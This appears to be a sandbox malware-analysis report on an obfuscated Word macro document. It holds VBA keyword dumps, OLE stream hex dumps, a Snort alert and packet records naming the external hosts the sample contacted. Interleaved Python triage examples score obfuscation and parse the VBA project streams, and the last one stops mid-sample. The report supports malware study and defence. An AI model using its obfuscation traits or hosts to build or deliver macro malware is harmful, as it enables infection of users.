                                        cpOKEJtD()
                                        FcFNoAAE
                                        YxtlI
                                        iwKTZKXhU,
                                        vpanjBY
                                        sNgsIAHE(kIvjrjw)
                                        ClXNA.Range
                                        gNcgKABSu,
                                        DZIfc
                                        KiBukZaID.Range
                                        GxrODGqJO
                                        TIbRCHDII
                                        TYdyE()
                                        yrtjM
                                        tiGZxsJvH,
                                        JAlLID:
                                        Word.Paragraph
                                        Amrro:
                                        GScOJ:
                                        UBound(FIGYEGhf)
                                        XjKXDHK()
                                        ncCHIhhLE
                                        tGjntI
                                        ZnyfAN(fdZhB)
                                        MidB$(TYdyE,
                                        (CAlyYGB
                                        UjrtBI
                                        gwagFYDyL,
                                        zdCmAI
                                        Content
                                        (rJumAGpCU
                                        (zBkPfohF
                                        cEmoHG
                                        BKSuHOBvJ
                                        UBound(TYdyE)
                                        HNhWtDI:
                                        tdXEHJ
                                        WtYQEjgU
                                        BlJoEDG
                                        cpOKEJtD(dQxQHD)
                                        MidB$(LHEHF,
                                        mWxDGCZ()
                                        uXlUZy.Range
                                        TYdyE
                                        EWIhJ
                                        qWifvgt
                                        (IUYlYAEA
                                        KVCwR
                                        RKIpPiC,
                                        apjbJ
                                        UMnSoxA
                                        MidB$(ZBynKFIwD,
                                        (GxrODGqJO
                                        MidB$(XjKXDHK,
                                        PdfUXG:
                                        raTZFsA
                                        GxrODGqJO,
                                        dQxQHD
                                        dQxQHD,
                                        dveWsFckI
                                        VVTbccCG
                                        UBound(EOcYgB)
                                        PBPzFIbWR,
                                        ceHSbhbJB:
                                        UBound(WLHzhZ)
                                        TYdyE(raTZFsA)
                                        VLtTfYFt,
                                        ZnyfAN()
                                        KiBukZaID
                                        zBkPfohF
                                        bNYyYXL.Range
                                        MdzVCx:
                                        fuDVD
                                        mWxDGCZ
                                        iNgeDAH
                                        mFbuvJLI.Range
                                        KubaMOGU
                                        MidB$(SZReI,
                                        SImJJG
                                        VDpyCCYs
                                        CeWPLG
                                        QDTPGBDf
                                        Amrro
                                        zRFIAwB,
                                        MidB$(wegaJFI,
                                        eJWWCW
                                        rXzEFGHKJ
                                        TizYJf
                                        Len(skuwd))
                                        YnzSJBHHF
                                        MidB$(EOcYgB,
                                        gNcgKABSu
                                        QJnPD
                                        MidB$(VDHdFe,
                                        CEOrEZgDD
                                        mFbuvJLI
                                        WLznQDX
                                        ZTyEBE(AJDjqGF)
                                        suzkCEJLA
                                        OgHJdA
                                        UBound(fxXYAMVdF)
                                        UBound(RbMyeP)
                                        MEvFND:
                                        (gNcgKABSu
                                        fxXYAMVdF(lscvJD)
                                        CwgHH:
                                        lscvJD,
                                        CuXRxFgAL
                                        cvaip
                                        cVcnEoADJ,
                                        ceHSbhbJB
                                        ZpWVJHXEu
                                        MidB$(ZnyfAN,
                                        (iwKTZKXhU
                                        kIvjrjw,
                                        BVtuJgIH
                                        raTZFsA,
                                        GErrVLlHD,
                                        FIGYEGhf
                                        Mid(skuwd,
                                        igPim
                                        psbMqwGY
                                        jUjjFhGI,
                                        UBound(uyhJSGFz)
                                        MdzVCx
                                        UBound(nnlZQJ)
                                        PBgduIjWs
                                        UBound(ZBynKFIwD)
                                        KaMtAb
                                        MidB$(cpOKEJtD,
                                        gTBbxHBP
                                        NZUhGE
                                        Error
                                        dvdwE
                                        YTtAAI,
                                        PBPzFIbWR
                                        (drGfeJB
                                        yvMEADFZV
                                        CEOrEZgDD.Range
                                        RvTnG
                                        MEvFND
                                        PBgduIjWs,
                                        (PBgduIjWs
                                        tHCfD
                                        jUjjFhGI
                                        upruE
                                        PdfUXG
                                        MidB$(WLHzhZ,
                                        uXlUZy
                                        Function
                                        (fuDVD
                                        nlqbKVFYf
                                        MidB$(mWxDGCZ,
                                        (PBPzFIbWR
                                        ckzLJpOd
                                        (cVcnEoADJ
                                        PulHIFHnz.Range
                                        uVJHDJ
                                        NyNKZ
                                        WSUqgCG
                                        nnjasd
                                        wegaJFI
                                        UBound(mWxDGCZ)
                                        FIGYEGhf(cBmPNCJSv)
                                        WtYQEjgU.Range
                                        sNgsIAHE
                                        skuwd
                                        IlkMCOGt
                                        VBA Code
                                        VBA File Name: M355vvc_qfa, Stream Size: 1106
General
Stream Path: Macros/VBA/M355vvc_qfa
VBA File Name: M355vvc_qfa
Stream Size: 1106
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 21 ef 9b b5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        False
                                        Private
                                        VB_Exposed
                                        Attribute
                                        VB_Creatable
                                        VB_Name
                                        Document_open()
                                        VB_PredeclaredId
                                        VB_GlobalNameSpace
                                        VB_Base
                                        VB_Customizable
                                        VB_TemplateDerived
                                        VBA Code
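The two keyword dumps above are what the report's obfuscation signatures are built on: a Document_open() auto-exec entry point, dozens of machine-generated identifiers, repeated MidB$/Mid/UBound/Len calls used to reassemble strings, line labels used as GoTo targets, and reads of the document body through .Range, Content and Word.Paragraph. The following is an added example of how to score such a dump for those traits; it is not Joe Sandbox code, the sample list is a subset of the keywords shown above, and the random-name heuristic, keyword sets and thresholds are this example's own assumptions.

```python
"""Score a VBA keyword dump for the obfuscation traits sandbox signatures key on.

Added example for this report, not Joe Sandbox code. SAMPLE_KEYWORDS is a subset
of the keyword dump above; the keyword sets, thresholds and the random-name
heuristic are this example's own assumptions.
"""
import re
from collections import Counter

STRING_OPS = {"Mid", "Mid$", "MidB", "MidB$", "Len", "UBound", "LBound", "Chr", "ChrW",
              "Join", "Split", "Replace", "StrReverse", "Left", "Right"}
AUTOEXEC = {"document_open", "document_close", "autoopen", "autoexec", "workbook_open"}
DOC_CONTENT = {"Range", "Content", "Paragraph", "Paragraphs", "Shapes", "AlternativeText"}
VBA_NOISE = {"Attribute", "Function", "Sub", "End", "Private", "Public", "True", "False",
             "Error", "Application", "Word"}
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\$?")

# Subset of the keyword dump above (taken from both VBA modules).
SAMPLE_KEYWORDS = [
    "FcbwGH", "UBound(sNgsIAHE)", "goDHgU", "ncCHIhhLE.Range", "LHEHF()",
    "uyhJSGFz(iwKTZKXhU)", "MidB$(fxXYAMVdF,", "Mid(Application.Name,",
    "Word.Paragraph", "Content", "Len(skuwd))", "Mid(skuwd,",
    '"sadsaccc"', '"sasdsacc"', "VB_Name", "Attribute", "Function", "Error",
    "Document_open()", "VB_PredeclaredId", "UBound(LHEHF)", "MidB$(TYdyE,",
    "nnjasd", "mwapl:", "KVCwR:", "ZpWVJHXEu:", "QDTPGBDf:",
]


def looks_random(name):
    """Heuristic for generated names: case flips inside the word, or almost no vowels."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    return flips >= 2 or vowel_ratio <= 0.2


def triage(keywords):
    r = {"string_ops": Counter(), "autoexec": [], "doc_content": set(), "labels": 0,
         "string_literals": [], "identifiers": 0, "random_identifiers": 0}
    for kw in (k.strip() for k in keywords):
        if len(kw) >= 2 and kw[0] == kw[-1] == '"':
            r["string_literals"].append(kw[1:-1])
            continue
        if kw.endswith(":"):            # "name:" is a line label, i.e. a GoTo target
            r["labels"] += 1
        for tok in IDENT.findall(kw):
            if tok in STRING_OPS:
                r["string_ops"][tok] += 1
            elif tok.lower() in AUTOEXEC:
                r["autoexec"].append(tok)
            elif tok in DOC_CONTENT:
                r["doc_content"].add(tok)
            elif tok in VBA_NOISE or tok.startswith("VB_"):
                continue                # language keywords and module attributes
            else:
                r["identifiers"] += 1
                r["random_identifiers"] += int(looks_random(tok))
    ratio = r["random_identifiers"] / r["identifiers"] if r["identifiers"] else 0.0
    r["random_ratio"] = round(ratio, 2)
    # Assumed rule: auto-exec entry point plus mostly generated names plus either
    # several string-assembly calls or several GoTo labels.
    r["suspicious"] = bool(r["autoexec"]) and ratio >= 0.5 and (
        sum(r["string_ops"].values()) >= 3 or r["labels"] >= 3)
    return r


if __name__ == "__main__":
    for key, value in triage(SAMPLE_KEYWORDS).items():
        print(f"{key}: {value}")
```

On the sample, 17 of 18 user identifiers look generated, there are seven string-assembly calls and four GoTo labels, Document_open is the entry point, and the macro reads the document body (Range, Content, Paragraph), which together is the shape the report's signature lines describe. The name heuristic is deliberately crude; use it to rank modules for a human look, not as a verdict on its own.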

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 146
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 146
Entropy: 4.00187355764
Base64 Encoded: False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.280929556603
Base64 Encoded: False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . i m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 560
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 560
Entropy: 4.19057510655
Base64 Encoded: False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 00 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 64 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                        Stream Path: 1Table, File Type: data, Stream Size: 6861
General
Stream Path: 1Table
File Type: data
Stream Size: 6861
Entropy: 6.02796509914
Base64 Encoded: True
                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                        Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
General
Stream Path: Macros/PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 527
Entropy: 5.53582683965
Base64 Encoded: True
                                        Data ASCII:I D = " { 2 9 5 B 6 3 F 5 - 9 1 F 2 - 4 C D 4 - 9 F 3 3 - 2 8 A 3 2 3 E 7 5 3 5 E } " . . D o c u m e n t = M 3 5 5 v v c _ q f a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = A b l j q x j k b k 2 v y _ l w k . . M o d u l e = G 8 g 2 g k h 6 b w r y _ _ u i . . E x e N a m e 3 2 = " L 9 0 7 d 5 k 7 i f h z f 8 e l k " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 E 0 C C 7 D 5 C 7 D 5 C 3 D 9 C 3 D 9 C 3 D 9 C 3 D 9
                                        Data Raw:49 44 3d 22 7b 32 39 35 42 36 33 46 35 2d 39 31 46 32 2d 34 43 44 34 2d 39 46 33 33 2d 32 38 41 33 32 33 45 37 35 33 35 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4d 33 35 35 76 76 63 5f 71 66 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 41 62 6c 6a 71 78 6a 6b 62 6b 32 76 79 5f 6c 77 6b 0d 0a 4d 6f 64 75 6c 65 3d 47 38 67 32 67 6b 68 36 62 77 72 79 5f 5f 75 69 0d
                                        Stream Path: Macros/PROJECTwm, File Type: Clarion Developer (v2 and above) memo data, Stream Size: 143
General
Stream Path: Macros/PROJECTwm
File Type: Clarion Developer (v2 and above) memo data
Stream Size: 143
Entropy: 3.74033053781
Base64 Encoded: False
                                        Data ASCII:M 3 5 5 v v c _ q f a . M . 3 . 5 . 5 . v . v . c . _ . q . f . a . . . A b l j q x j k b k 2 v y _ l w k . A . b . l . j . q . x . j . k . b . k . 2 . v . y . _ . l . w . k . . . G 8 g 2 g k h 6 b w r y _ _ u i . G . 8 . g . 2 . g . k . h . 6 . b . w . r . y . _ . _ . u . i . . . . .
                                        Data Raw:4d 33 35 35 76 76 63 5f 71 66 61 00 4d 00 33 00 35 00 35 00 76 00 76 00 63 00 5f 00 71 00 66 00 61 00 00 00 41 62 6c 6a 71 78 6a 6b 62 6b 32 76 79 5f 6c 77 6b 00 41 00 62 00 6c 00 6a 00 71 00 78 00 6a 00 6b 00 62 00 6b 00 32 00 76 00 79 00 5f 00 6c 00 77 00 6b 00 00 00 47 38 67 32 67 6b 68 36 62 77 72 79 5f 5f 75 69 00 47 00 38 00 67 00 32 00 67 00 6b 00 68 00 36 00 62 00 77 00 72
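The Macros/PROJECT and Macros/PROJECTwm streams shown above are the VBA project's own module inventory: PROJECT is INI-style text (ID, Document=, Module=, Name=, ...) and PROJECTwm is a binary list of every module name once in ANSI and once in UTF-16LE, each pair NUL-terminated and the whole list ended by a double NUL. The following added example parses both and cross-checks them; it is not Joe Sandbox code. The PROJECTwm bytes are reconstructed from the Data ASCII / Data Raw dump above (the dump shows the first 64 bytes in hex, the rest follows the ASCII rendering, and the byte count comes out at the reported 143), and the PROJECT text is the part of that stream the dump shows, which is cut off inside the CMG= line, so that line and anything after it are left out.

```python
"""Parse the PROJECT and PROJECTwm streams of an OLE VBA project and cross-check them.

Added example for this report, not Joe Sandbox code. PROJECTWM_STREAM is
reconstructed from the report's dump (143 bytes, matching the reported size);
PROJECT_STREAM is the visible prefix of the PROJECT stream, without the
truncated CMG= line and whatever followed it.
"""
import math
from collections import Counter

PROJECTWM_STREAM = bytes.fromhex("""
4d 33 35 35 76 76 63 5f 71 66 61 00
4d 00 33 00 35 00 35 00 76 00 76 00 63 00 5f 00 71 00 66 00 61 00 00 00
41 62 6c 6a 71 78 6a 6b 62 6b 32 76 79 5f 6c 77 6b 00
41 00 62 00 6c 00 6a 00 71 00 78 00 6a 00 6b 00 62 00 6b 00 32 00 76 00 79 00 5f 00 6c 00 77 00 6b 00 00 00
47 38 67 32 67 6b 68 36 62 77 72 79 5f 5f 75 69 00
47 00 38 00 67 00 32 00 67 00 6b 00 68 00 36 00 62 00 77 00 72 00 79 00 5f 00 5f 00 75 00 69 00 00 00
00 00
""")

PROJECT_STREAM = (
    'ID="{295B63F5-91F2-4CD4-9F33-28A323E7535E}"\r\n'
    "Document=M355vvc_qfa/&H00000000\r\n"
    "Module=Abljqxjkbk2vy_lwk\r\n"
    "Module=G8g2gkh6bwry__ui\r\n"
    'ExeName32="L907d5k7ifhzf8elk"\r\n'
    'Name="DD"\r\n'
    'HelpContextID="0"\r\n'
    'VersionCompatible32="393222000"\r\n'
)


def parse_projectwm(data: bytes):
    """MS-OVBA 2.3.3: repeated (ANSI name NUL, UTF-16LE name NUL NUL), ended by NUL NUL."""
    names, pos = [], 0
    while pos + 1 < len(data) and data[pos:pos + 2] != b"\x00\x00":
        end = data.index(b"\x00", pos)
        ansi = data[pos:end].decode("cp1252")
        pos = end + 1
        uend = pos
        while data[uend:uend + 2] not in (b"\x00\x00", b""):   # step by code unit, not byte
            uend += 2
        if data[uend:uend + 2] != b"\x00\x00":
            raise ValueError("truncated PROJECTwm stream")
        names.append((ansi, data[pos:uend].decode("utf-16-le")))
        pos = uend + 2
    return names


def parse_project(text: str):
    """PROJECT is INI-like; keys such as Module repeat, so keep an ordered list of pairs."""
    pairs = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            pairs.append((key.strip(), value.strip().strip('"')))
    return pairs


def project_modules(pairs):
    # Document=<name>/&H<flags>, Module=<name>
    return [v.split("/", 1)[0] for k, v in pairs if k in ("Document", "Module")]


def shannon_entropy(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inventory():
    wm = parse_projectwm(PROJECTWM_STREAM)
    proj = project_modules(parse_project(PROJECT_STREAM))
    return {
        "projectwm": [a for a, _ in wm],
        "project": proj,
        "ansi_matches_unicode": all(a == u for a, u in wm),
        "consistent": sorted(a for a, _ in wm) == sorted(proj),
        "entropy": round(shannon_entropy(PROJECTWM_STREAM), 4),
    }


if __name__ == "__main__":
    for key, value in inventory().items():
        print(f"{key}: {value}")
```

Both streams name the same three modules (the document module M355vvc_qfa and the two standard modules), the ANSI and Unicode spellings agree, and the entropy of the reconstructed bytes reproduces the 3.7403 the report lists for this stream, which is a cheap check that the reconstruction is byte-exact. A disagreement between the two streams, or between the two spellings of one name, is not something Office itself produces and would be worth a closer look.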
                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5999
General
Stream Path: Macros/VBA/_VBA_PROJECT
File Type: data
Stream Size: 5999
Entropy: 5.68646242434
Base64 Encoded: False
                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                        Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 673
General
Stream Path: Macros/VBA/dir
File Type: data
Stream Size: 673
Entropy: 6.39911199811
Base64 Encoded: True
                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . i . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                        Data Raw:01 9d b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 bc 69 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                        Stream Path: WordDocument, File Type: data, Stream Size: 110549
General
Stream Path: WordDocument
File Type: data
Stream Size: 110549
Entropy: 7.12253058621
Base64 Encoded: True
                                        Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . u . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . b . . . . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 a1 75 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 d5 af 01 00 62 7f 00 00 62 7f 00 00 a1 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                        Stream Path: word, File Type: data, Stream Size: 1936
General
Stream Path: word
File Type: data
Stream Size: 1936
Entropy: 7.89613362831
Base64 Encoded: False
                                        Data ASCII:. . . . . . B . : a . p + m } . . . 0 & . K p . , . . . . : . . . 0 . e : 3 * t . . . . . o k j & ' . ^ . . 2 c % . c . . E . . . v . . . . . . . B . . . . . . . . j . . . . ~ ? 1 . Z . . . . . . . p . . { . . . . F . D . . ' # n . O . . p . . . z . s ! . e . 4 , . 8 . . . . . . T . . . & ) 3 w / . T . . . t . 5 . L . . . . . . . . . L . . . 0 . . D J . T . @ . t . . I b ; . . . . ` t . G . . . G F D * . . . . . l / . W . . . U . L . . | . + I . . B . . . m B . . G . ~ . . . . . . . { ; C . . . . . . %
                                        Data Raw:af 95 f0 90 e4 f9 42 b2 3a 61 09 70 2b 6d 7d e6 bb f9 30 26 92 4b 70 e7 2c 14 1f fc 92 3a 7f ef f9 30 e2 65 3a 33 2a 74 e4 a6 a3 8f ea 6f 6b 6a 26 27 8a 5e db f3 32 63 25 08 63 d0 d9 45 20 ff e2 1a 76 fa 8a 18 ac 87 ce bc 42 eb a7 e1 fd bc a9 b5 d6 6a b0 20 13 05 fe 7e 3f 31 d0 5a 9a 9e 86 a4 ac d0 f9 70 df 0e 7b 03 8f 1f b1 46 bc 44 0b a6 27 23 6e b5 4f c1 06 70 fc 0c d8 7a b6 73

                                        Network Behavior

                                        Snort IDS Alerts

Timestamp                 Protocol  SID  Message                                        Source Port  Dest Port  Source IP     Dest IP
01/25/21-18:41:15.656947  ICMP      402  ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.22  8.8.8.8
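The TCP Packets table below lists each packet between the analysis VM (192.168.2.22) and three web servers on port 80, but without flags or payload sizes, so the useful reading is per flow: which servers answered at all, and how long each exchange lasted. The following added example, not part of the report, rebuilds that view from the rows of the table (copied in as the sample input); the only assumption beyond the rows themselves is that 192.168.2.22 is the sandbox host, which the table makes evident.

```python
"""Rebuild per-peer TCP flows from a sandbox packet table and flag unanswered attempts.

Added example for this report, not Joe Sandbox code. PACKET_TABLE holds the rows of
the report's TCP Packets table (timestamp, src port, dst port, src IP, dst IP);
SANDBOX_HOST is the analysis VM address seen in every row.
"""
from datetime import datetime

SANDBOX_HOST = "192.168.2.22"

PACKET_TABLE = """\
Jan 25, 2021 18:41:13.270375967 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:13.439429998 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.439626932 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:13.442131996 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:13.612253904 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.626480103 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.644927979 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:13.854820967 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890619040 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890644073 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890659094 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890676022 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890692949 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890708923 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:13.890867949 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:13.999680042 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:14.202847004 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:15.644818068 CET 49166 80 192.168.2.22 124.156.135.253
Jan 25, 2021 18:41:18.649360895 CET 49166 80 192.168.2.22 124.156.135.253
Jan 25, 2021 18:41:18.893965960 CET 80 49165 162.241.253.129 192.168.2.22
Jan 25, 2021 18:41:18.894093037 CET 49165 80 192.168.2.22 162.241.253.129
Jan 25, 2021 18:41:24.655850887 CET 49166 80 192.168.2.22 124.156.135.253
Jan 25, 2021 18:41:36.874211073 CET 49167 80 192.168.2.22 23.227.169.146
Jan 25, 2021 18:41:37.046713114 CET 80 49167 23.227.169.146 192.168.2.22
Jan 25, 2021 18:41:37.046950102 CET 49167 80 192.168.2.22 23.227.169.146
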